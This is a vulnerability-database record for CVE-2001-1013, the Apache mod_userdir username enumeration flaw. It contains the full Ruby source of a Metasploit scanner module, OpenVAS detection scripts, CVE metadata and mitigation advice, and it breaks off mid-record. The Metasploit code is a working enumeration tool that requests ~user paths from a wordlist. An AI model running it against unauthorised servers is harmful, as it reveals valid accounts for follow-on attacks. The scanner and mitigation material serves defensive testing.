ID MSF:AUXILIARY/SCANNER/HTTP/APACHE_USERDIR_ENUM Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
Apache with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
def initialize
super(
'Name' => 'Apache "mod_userdir" User Enumeration',
'Description' => %q{Apache with the UserDir directive enabled generates different error
codes when a username exists and there is no public_html directory and when the username
does not exist, which could allow remote attackers to determine valid usernames on the
server.},
'Author' =>
[
'Heyder Andrade <heyder.andrade[at]alligatorteam.org>',
],
'References' =>
[
['BID', '3335'],
['CVE', '2001-1013'],
['OSVDB', '637'],
],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]),
])
deregister_options(
'PASSWORD',
'PASS_FILE',
'USERPASS_FILE',
'STOP_ON_SUCCESS',
'BLANK_PASSWORDS',
'USER_AS_PASS'
)
end
def run_host(ip)
@users_found = {}
each_user_pass { |user,pass|
do_login(user)
}
if(@users_found.empty?)
print_status("#{full_uri} - No users found.")
else
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
report_note(
:host => rhost,
:port => rport,
:proto => 'tcp',
:sname => (ssl ? 'https' : 'http'),
:type => 'users',
:data => {:users => @users_found.keys.join(", ")}
)
end
end
def do_login(user)
vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
uri = normalize_uri(target_uri.path)
payload = "#{uri}~#{user}/"
begin
res = send_request_cgi!(
{
'method' => 'GET',
'uri' => payload,
'ctype' => 'text/plain'
}, 20)
return unless res
if ((res.code == 403) or (res.code == 200))
print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
@users_found[user] = :reported
else
vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
{"id": "MSF:AUXILIARY/SCANNER/HTTP/APACHE_USERDIR_ENUM", "type": "metasploit", "bulletinFamily": "exploit", "title": "Apache \"mod_userdir\" User Enumeration", "description": "Apache with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.\n", "published": "2011-08-15T05:56:55", "modified": "2017-07-24T13:26:21", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1013"], "cvelist": ["CVE-2001-1013"], "lastseen": "2020-06-23T23:55:22", "viewCount": 459, "enchantments": {"score": {"value": 5.1, "vector": "NONE", "modified": "2020-06-23T23:55:22", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2001-1013"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803531", "OPENVAS:104150", "OPENVAS:10766", "OPENVAS:1361412562310104150", "OPENVAS:136141256231010766", "OPENVAS:1361412562310104039", "OPENVAS:104039"]}, {"type": "nessus", "idList": ["APACHE_USERNAME.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:21112"]}, {"type": "nmap", "idList": ["NMAP:HTTP-USERDIR-ENUM.NSE"]}, {"type": "osvdb", "idList": ["OSVDB:637"]}], "modified": "2020-06-23T23:55:22", "rev": 2}, "vulnersScore": 5.1}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/apache_userdir_enum.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::AuthBrute\n\n def initialize\n super(\n 'Name' => 'Apache \"mod_userdir\" User Enumeration',\n 'Description' => %q{Apache with the UserDir directive enabled generates different error\n codes when a username exists and there is no public_html directory and when the username\n does not exist, which could allow remote attackers to determine valid usernames on the\n server.},\n 'Author' =>\n [\n 'Heyder Andrade <heyder.andrade[at]alligatorteam.org>',\n ],\n 'References' =>\n [\n ['BID', '3335'],\n ['CVE', '2001-1013'],\n ['OSVDB', '637'],\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),\n OptPath.new('USER_FILE', [ true, \"File containing users, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"unix_users.txt\") ]),\n ])\n\n deregister_options(\n 'PASSWORD',\n 'PASS_FILE',\n 'USERPASS_FILE',\n 'STOP_ON_SUCCESS',\n 'BLANK_PASSWORDS',\n 'USER_AS_PASS'\n )\n end\n\n def run_host(ip)\n @users_found = {}\n\n each_user_pass { |user,pass|\n do_login(user)\n }\n\n if(@users_found.empty?)\n print_status(\"#{full_uri} - No users found.\")\n else\n print_good(\"#{full_uri} - Users found: #{@users_found.keys.sort.join(\", \")}\")\n report_note(\n :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :sname => (ssl ? 'https' : 'http'),\n :type => 'users',\n :data => {:users => @users_found.keys.join(\", \")}\n )\n end\n end\n\n def do_login(user)\n\n vprint_status(\"#{full_uri}~#{user} - Trying UserDir: '#{user}'\")\n uri = normalize_uri(target_uri.path)\n payload = \"#{uri}~#{user}/\"\n begin\n res = send_request_cgi!(\n {\n 'method' => 'GET',\n 'uri' => payload,\n 'ctype' => 'text/plain'\n }, 20)\n\n return unless res\n if ((res.code == 403) or (res.code == 200))\n print_good(\"#{full_uri} - Apache UserDir: '#{user}' found \")\n @users_found[user] = :reported\n else\n vprint_status(\"#{full_uri} - Apache UserDir: '#{user}' not found \")\n end\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2021-02-02T05:19:04", "description": "Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.", "edition": 4, "cvss3": {}, "published": "2001-09-12T04:00:00", "title": "CVE-2001-1013", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-1013"], "modified": "2017-12-19T02:29:00", "cpe": ["cpe:/o:redhat:linux:7.0"], "id": "CVE-2001-1013", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1013", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:linux:7.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:13:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013"], "description": "Attempts to enumerate valid usernames on web servers running with the mod_userdir module or similar\nenabled.\n\nThe Apache mod_userdir module allows user-specific directories to be accessed using the\nhttp://example.com/~user/ syntax. This script makes http requests in order to discover valid user-\nspecific directories and infer valid usernames. By default, the script will use Nmap's\n'nselib/data/usernames.lst'. An HTTP response status of 200 or 403 means the username is\nlikely a valid one and the username will be output in the script results along with the status code\n(in parentheses).\n\nThis script makes an attempt to avoid false positives by requesting a directory which is unlikely to\nexist. If the server responds with 200 or 403 then the script will not continue testing it.\n\nSYNTAX:\n\nuserdir.users: The filename of a username list.\n\n\nhttp.useragent: The value of the User-Agent header field sent with\nrequests. By default it is\n''Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)''.\nA value of the empty string disables sending the User-Agent header field.\n\n\n\nlimit: The maximum number of users to check.\n\n\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.\n\n\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).", "modified": "2017-03-21T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:104039", "href": "http://plugins.openvas.org/nasl.php?oid=104039", "type": "openvas", "title": "Nmap NSE net: http-userdir-enum", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_http_userdir_enum_net.nasl 5658 2017-03-21 11:17:56Z cfi $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: jah\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Attempts to enumerate valid usernames on web servers running with the mod_userdir module or similar\nenabled.\n\nThe Apache mod_userdir module allows user-specific directories to be accessed using the\nhttp://example.com/~user/ syntax. This script makes http requests in order to discover valid user-\nspecific directories and infer valid usernames. By default, the script will use Nmap's\n'nselib/data/usernames.lst'. An HTTP response status of 200 or 403 means the username is\nlikely a valid one and the username will be output in the script results along with the status code\n(in parentheses).\n\nThis script makes an attempt to avoid false positives by requesting a directory which is unlikely to\nexist. If the server responds with 200 or 403 then the script will not continue testing it.\n\nSYNTAX:\n\nuserdir.users: The filename of a username list.\n\n\nhttp.useragent: The value of the User-Agent header field sent with\nrequests. By default it is\n''Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)''.\nA value of the empty string disables sending the User-Agent header field.\n\n\n\nlimit: The maximum number of users to check.\n\n\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.\n\n\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\";\n\nif(description)\n{\n script_id(104039);\n script_version(\"$Revision: 5658 $\");\n script_cve_id(\"CVE-2001-1013\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-21 12:17:56 +0100 (Tue, 21 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Nmap NSE net: http-userdir-enum\");\n\n\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n script_dependencies(\"nmap_nse_net.nasl\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse_net\");\n\n script_add_preference(name:\"userdir.users\", value:\"\", type:\"entry\");\n script_add_preference(name:\"http.useragent\", value:\"\", type:\"entry\");\n script_add_preference(name:\"limit\", value:\"\", type:\"entry\");\n script_add_preference(name:\"http-max-cache-size\", value:\"\", type:\"entry\");\n script_add_preference(name:\"http.pipeline\", value:\"\", type:\"entry\");\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"nmap.inc\");\n\n# The corresponding NSE script does't belong to the 'safe' category\nif (safe_checks()) exit(0);\n\nphase = 0;\nif (defined_func(\"scan_phase\")) {\n phase = scan_phase();\n}\n\nif (phase == 1) {\n # Get the preferences\n argv = make_array();\n\n pref = script_get_preference(\"userdir.users\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"userdir.users\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"http.useragent\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http.useragent\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"limit\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"limit\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"http-max-cache-size\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http-max-cache-size\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"http.pipeline\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http.pipeline\"] = string('\"', pref, '\"');\n }\n nmap_nse_register(script:\"http-userdir-enum\", args:argv);\n} else if (phase == 2) {\n res = nmap_nse_get_results(script:\"http-userdir-enum\");\n foreach portspec (keys(res)) {\n output_banner = 'Result found by Nmap Security Scanner (http-userdir-enum.nse) http://nmap.org:\\n\\n';\n if (portspec == \"0\") {\n security_message(data:output_banner + res[portspec], port:0);\n } else {\n v = split(portspec, sep:\"/\", keep:0);\n proto = v[0];\n port = v[1];\n security_message(data:output_banner + res[portspec], port:port, protocol:proto);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013"], "description": "Attempts to enumerate valid usernames on web servers running with the mod_userdir module or similar\nenabled.\n\nThe Apache mod_userdir module allows user-specific directories to be accessed using the\nhttp://example.com/~user/ syntax. This script makes http requests in order to discover valid user-\nspecific directories and infer valid usernames. By default, the script will use Nmap", "modified": "2020-07-07T00:00:00", "published": "2013-02-28T00:00:00", "id": "OPENVAS:1361412562310803531", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803531", "type": "openvas", "title": "Nmap NSE 6.01: http-userdir-enum", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: jah\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803531\");\n script_version(\"2020-07-07T14:13:50+0000\");\n script_cve_id(\"CVE-2001-1013\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-07 14:13:50 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-02-28 19:00:20 +0530 (Thu, 28 Feb 2013)\");\n script_name(\"Nmap NSE 6.01: http-userdir-enum\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2013 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE\");\n\n script_tag(name:\"summary\", value:\"Attempts to enumerate valid usernames on web servers running with the mod_userdir module or similar\nenabled.\n\nThe Apache mod_userdir module allows user-specific directories to be accessed using the\nhttp://example.com/~user/ syntax. This script makes http requests in order to discover valid user-\nspecific directories and infer valid usernames. By default, the script will use Nmap's\n'nselib/data/usernames.lst'. An HTTP response status of 200 or 403 means the username is\nlikely a valid one and the username will be output in the script results along with the status code\n(in parentheses).\n\nThis script makes an attempt to avoid false positives by requesting a directory which is unlikely to\nexist. If the server responds with 200 or 403 then the script will not continue testing it.\n\nSYNTAX:\n\nuserdir.users: The filename of a username list.\n\nlimit: The maximum number of users to check.\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013"], "description": "Attempts to enumerate valid usernames on web servers running with the mod_userdir module or similar\nenabled.\n\nThe Apache mod_userdir module allows user-specific directories to be accessed using the\nhttp://example.com/~user/ syntax. This script makes http requests in order to discover valid user-\nspecific directories and infer valid usernames. By default, the script will use Nmap", "modified": "2020-07-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:1361412562310104039", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104039", "type": "openvas", "title": "Nmap NSE net: http-userdir-enum", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: jah\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.104039\");\n script_version(\"2020-07-07T14:13:50+0000\");\n script_cve_id(\"CVE-2001-1013\");\n script_tag(name:\"last_modification\", value:\"2020-07-07 14:13:50 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Nmap NSE net: http-userdir-enum\");\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2011 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n\n script_tag(name:\"summary\", value:\"Attempts to enumerate valid usernames on web servers running with the mod_userdir module or similar\nenabled.\n\nThe Apache mod_userdir module allows user-specific directories to be accessed using the\nhttp://example.com/~user/ syntax. This script makes http requests in order to discover valid user-\nspecific directories and infer valid usernames. By default, the script will use Nmap's\n'nselib/data/usernames.lst'. An HTTP response status of 200 or 403 means the username is\nlikely a valid one and the username will be output in the script results along with the status code\n(in parentheses).\n\nThis script makes an attempt to avoid false positives by requesting a directory which is unlikely to\nexist. If the server responds with 200 or 403 then the script will not continue testing it.\n\nSYNTAX:\n\nuserdir.users: The filename of a username list.\n\nlimit: The maximum number of users to check.\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-12-08T11:44:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013"], "description": "An information leak occurs on Apache based web servers \nwhenever the UserDir module is enabled. The vulnerability allows an external \nattacker to enumerate existing accounts by requesting access to their home \ndirectory and monitoring the response.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:10766", "href": "http://plugins.openvas.org/nasl.php?oid=10766", "type": "openvas", "title": "Apache UserDir Sensitive Information Disclosure", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: apache_username.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: Apache UserDir Sensitive Information Disclosure\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n#\n# Copyright:\n# Copyright (C) 2001 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"An information leak occurs on Apache based web servers \nwhenever the UserDir module is enabled. The vulnerability allows an external \nattacker to enumerate existing accounts by requesting access to their home \ndirectory and monitoring the response.\";\n\ntag_solution = \"1) Disable this feature by changing 'UserDir public_html' (or whatever) to \n'UserDir disabled'.\n\nOr\n\n2) Use a RedirectMatch rewrite rule under Apache -- this works even if there \nis no such entry in the password file, e.g.:\nRedirectMatch ^/~(.*)$ http://my-target-webserver.somewhere.org/$1\n\nOr\n\n3) Add into httpd.conf:\nErrorDocument 404 http://localhost/sample.html\nErrorDocument 403 http://localhost/sample.html\n(NOTE: You need to use a FQDN inside the URL for it to work properly).\n\nAdditional Information:\nhttp://www.securiteam.com/unixfocus/5WP0C1F5FI.html\";\n\n\nif(description)\n{\n script_id(10766); \n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(3335);\n script_cve_id(\"CVE-2001-1013\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n name = \"Apache UserDir Sensitive Information Disclosure\";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n script_copyright(\"This script is Copyright (C) 2001 SecuriTeam\");\n family = \"Web Servers\";\n script_family(family);\n\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_keys(\"www/apache\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\n\nif (! get_port_state(port)) exit(0);\n\nsoc = http_open_socket(port);\nif(! soc) exit(0);\n\n\nsoc = http_open_socket(port);\nif (soc)\n{\n req = http_head(item:\"/~root\", port:port);\n send(socket:soc, data:req);\n buf_valid = recv_line(socket:soc, length:1000);\n http_close_socket(soc);\n}\n\nsoc = http_open_socket(port);\nif (soc)\n{\n req = http_head(item:\"/~anna_foo_fighter\", port:port);\n send(socket:soc, data:req);\n buf_invalid = recv_line(socket:soc, length:1000);\n http_close_socket(soc);\n}\n\nif ((\"403 Forbidden\" >< buf_valid) && (\"404 Not Found\" >< buf_invalid))\n{\n security_message(port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-05-12T15:08:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013"], "description": "An information leak occurs on Apache based web servers\n whenever the UserDir module is enabled. The vulnerability allows an external\n attacker to enumerate existing accounts by requesting access to their home\n directory and monitoring the response.", "modified": "2020-05-08T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010766", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010766", "type": "openvas", "title": "Apache UserDir Sensitive Information Disclosure", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Apache UserDir Sensitive Information Disclosure\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n#\n# Copyright:\n# Copyright (C) 2001 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10766\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(3335);\n script_cve_id(\"CVE-2001-1013\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Apache UserDir Sensitive Information Disclosure\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2001 SecuriTeam\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_mandatory_keys(\"apache/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"http://www.securiteam.com/unixfocus/5WP0C1F5FI.html\");\n\n script_tag(name:\"solution\", value:\"1) Disable this feature by changing 'UserDir public_html' (or whatever) to\n 'UserDir disabled'.\n\n Or\n\n 2) Use a RedirectMatch rewrite rule under Apache -- this works even if there\n is no such entry in the password file, e.g.:\n RedirectMatch ^/~(.*)$ http://example.com/$1\n\n Or\n\n 3) Add into httpd.conf:\n\n ErrorDocument 404 http://example.com/sample.html\n\n ErrorDocument 403 http://example.com/sample.html\n\n (NOTE: You need to use a FQDN inside the URL for it to work properly).\");\n\n script_tag(name:\"summary\", value:\"An information leak occurs on Apache based web servers\n whenever the UserDir module is enabled. The vulnerability allows an external\n attacker to enumerate existing accounts by requesting access to their home\n directory and monitoring the response.\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:80);\n\nreq = http_head(item:\"/~root\", port:port);\nbuf_valid = http_send_recv(port:port, data:req);\n\nreq = http_head(item:\"/~anna_foo_fighter\", port:port);\nbuf_invalid = http_send_recv(port:port, data:req);\n\nif((\"403 Forbidden\" >< buf_valid) && (\"404 Not Found\" >< buf_invalid)) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-02T21:13:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013", "CVE-2009-3733"], "description": "Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 (http://fyrmassociates.com/tools.html).\n\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\n\n\nhttp.useragent: The value of the User-Agent header field sent with\nrequests. By default it is\n''Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)''.\nA value of the empty string disables sending the User-Agent header field.\n\n\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.", "modified": "2017-03-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:104150", "href": 